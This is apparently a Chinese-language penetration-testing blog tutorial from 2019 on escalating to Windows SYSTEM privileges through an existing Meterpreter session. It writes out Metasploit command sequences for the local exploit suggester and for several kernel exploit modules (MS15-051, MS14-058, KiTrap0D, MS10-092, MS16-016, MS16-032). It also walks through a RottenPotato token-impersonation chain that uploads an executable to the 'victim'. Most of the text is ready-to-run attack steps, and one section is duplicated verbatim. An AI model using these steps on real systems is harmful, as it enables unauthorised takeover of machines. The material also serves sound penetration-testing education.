?

May 09 2019

Metasploit框架中的Windows內核漏洞利用提權教程

首頁 » 滲透測試 » Metasploit框架中的Windows內核漏洞利用提權教程   

Metasploit框架中的Windows內核漏洞利用提權教程

Windows-Exploit-suggester
Metasploit內置模塊提供了各種可用于提權的local exploits,并會基于架構,平臺(即運行的操作系統),會話類型和所需默認選項提供建議。這極大的節省了我們的時間,省去了我們手動搜索local exploits的麻煩。雖說如此,但也并非所有列出的local exploits都可用。所以,無論是漏洞利用還是查找最好的辦法就是自動結合手動。 
用法
注:要使用local exploit suggester,我們必須已在目標機器上獲取到了一個Meterpreter session。在運行Local Exploit suggester之前,我們需要將現有的Meterpreter session調到后臺運行(CTRL + Z)
示例,假設我們現在有一個Meterpreter session 1
use post/multi/recon/local_exploit_suggester set LHOST 192.168.1.107 set SESSION 1 exploit
如下圖所示,它自動的為我們匹配出了一些可能的用于易受攻擊目標提權的漏洞利用模塊。

8.jpeg

Windows ClientCopyImage Win32k Exploit
Windows內核模式驅動程序特權提升漏洞。此模塊利用了win32k.sys內核模式驅動程序中的不正確對象處理進行提權。
該模塊已在Windows 7 x64和x86,Windows 2008 R2 SP1 x64的易受攻擊版本上進行了測試。
讓我們轉到MSF控制臺并執行該漏洞的exploit模塊
use exploit/windows/local/ms15_051_client_copy_image set lhost 192.168.1.107 set session 1 exploit
一旦exploit成功執行,就會打開另一個Meterpreter session
getsystem getuid
可以看到,我們當前的用戶權限已提升為了NT AUTHORITY\SYSTEM
9.jpeg

Windows TrackPopupMenu Win32k NULL指針解引用
此模塊利用了win32k.sys中的NULL指針解引用,漏洞可通過TrackPopupMenu函數進行觸發。在特殊情況下,我們可以濫用在xxxSendMessageTimeout上的NULL指針解引用,來實現任意代碼執行操作。
該模塊已在Windows XP SP3,Windows Server 2003 SP2,Windows 7 SP1 Windows Server 2008 32位和Windows Server 2008 R2 SP1 64位上進行了測試。
讓我們轉到MSF控制臺并執行該漏洞的exploit模塊
use exploit/windows/local/ms14_058_track_popup_menu set lhost 192.168.1.107 set session 1 exploit
一旦exploit成功執行,就會打開另一個Meterpreter session
getsystem getuid
可以看到,我們當前的用戶權限已提升為了NT AUTHORITY\SYSTEM
10.jpeg

通過KiTrap0D提升Windows權限
此模塊將通過KiTrap0D exploit創建具有SYSTEM權限的新會話,如果當前使用的會話權限已提升,則exploit將不會運行。該模塊依賴于kitrap0d.x86.dll,因此在x64版本的Windows上不受支持。
該模塊已在32位的Windows Server 2003,Windows Server 2008,Windows 7和XP易受攻擊版本上進行了測試。
讓我們轉到MSF控制臺并執行該漏洞的exploit模塊
use exploit/windows/local/ms10_015_kitrap0d set lhost 192.168.1.107 set session 1 exploit
一旦exploit成功執行,就會打開另一個Meterpreter session
getsystem getuid
可以看到,我們當前的用戶權限已提升為了NT AUTHORITY\SYSTEM
11.jpeg

Task Scheduler XML提權
此漏洞發生在Task Scheduler中,可允許用戶提升權限。如果攻擊者登錄到受影響的系統,并運行特制應用程序,則該漏洞可能允許特權提升。攻擊者必須擁有有效的登錄憑據,并且能夠在本地登錄才能成功利用此漏洞。遠程或匿名用戶則無法利用此漏洞。
該模塊已在Windows Vista,Windows 7,Windows Server 2008 x64和x86的易受攻擊版本上進行了測試。
讓我們轉到MSF控制臺并執行該漏洞的exploit模塊
use exploit/windows/local/ms10_092_schelevator set lhost 192.168.1.107 set session 1 exploit
一旦exploit成功執行,就會打開另一個Meterpreter session
getsystem getuid
可以看到,我們當前的用戶權限已提升為了NT AUTHORITY\SYSTEM

12.jpeg

MS16-016 mrxdav.sys WebDav本地提權
此模塊利用了mrxdav.sys中的漏洞。其將在目標系統生成一個進程,并在執行payload之前將其權限提升到NT AUTHORITY\SYSTEM。
該模塊已在Windows 7 SP1,x86架構的易受攻擊版本上進行了測試。
讓我們轉到MSF控制臺并執行該漏洞的exploit模塊
use exploit/windows/local/ms16_016_webdav set lhost 192.168.1.107 set session 1 exploit
一旦exploit成功執行,就會打開另一個Meterpreter session
getsystem getuid
可以看到,我們當前的用戶權限已提升為了NT AUTHORITY\SYSTEM
13.jpeg

MS16-016 mrxdav.sys WebDav本地提權
此模塊利用了mrxdav.sys中的漏洞。其將在目標系統生成一個進程,并在執行payload之前將其權限提升到NT AUTHORITY\SYSTEM。
該模塊已在Windows 7 SP1,x86架構的易受攻擊版本上進行了測試。
讓我們轉到MSF控制臺并執行該漏洞的exploit模塊
use exploit/windows/local/ms16_016_webdav set lhost 192.168.1.107 set session 1 exploit
一旦exploit成功執行,就會打開另一個Meterpreter session
getsystem getuid
可以看到,我們當前的用戶權限已提升為了NT AUTHORITY\SYSTEM
14.jpeg

MS16-032 Secondary Logon Handle提權
此模塊利用了Windows Secondary Logon Service中缺少標準句柄過濾的問題。該漏洞主要影響Windows 7-10和2k8-2k12 32/64位版本。此模塊僅適用于具有Powershell 2.0或更高版本的Windows系統,以及具有至少兩個或以上CPU內核的系統。
use exploit/windows/local/ms16_032_secondary_logon_handle_privesc set session 1 exploit
一旦exploit成功執行,就會打開另一個Meterpreter session
getsystem getuid
可以看到,我們當前的用戶權限已提升為了NT AUTHORITY\SYSTEM

15jpeg.jpeg

RottenPotato
使用RottenPotato將服務帳戶本地提權至SYSTEM。
首先,我們在meterpreter會話中使用以下選項查看當前系統上是否存在任何有效tokens。
load incognito list_token -u
可以看到,當前并沒有任何token可用。
16.jpeg

現在,我們從github下載Rottenpotato
git clone https://github.com/foxglovesec/RottenPotato.git cd RottenPotato
下載完成后我們會在Rottenpotato目錄下,看到一個rottenpotato.exe文件。
將該文件上傳至受害者機器。
upload /root/Desktop/RottenPotato/rottenpotato.exe .
17.jpeg

然后,鍵入以下命令執行該exe文件,并將SYSTEM token添加到impersonate user tokens下。
execute -Hc -f rottenpotato.exe impersonate_token "NT AUTHORITY\\SYSTEM"
可以看到,我們當前的用戶權限已提升為了NT AUTHORITY\SYSTEM
18.jpeg

正文部分到此結束

文章標簽: metasploit 提權漏洞

版權聲明:若無特殊注明,本文皆為( mOon )原創,轉載請保留文章出處。

也許喜歡: «Linux提權之SUID | 四個linux提權腳本»

你腫么看?

你還可以輸入 250/250 個字

? 微笑 大笑 拽 大哭 親親 流汗 噴血 奸笑 囧 不爽 暈 示愛 害羞 吃驚 驚嘆 愛你 嚇死了 呵呵

評論信息框

這篇文章還沒有收到評論,趕緊來搶沙發吧~

?
?
河北11选5开奖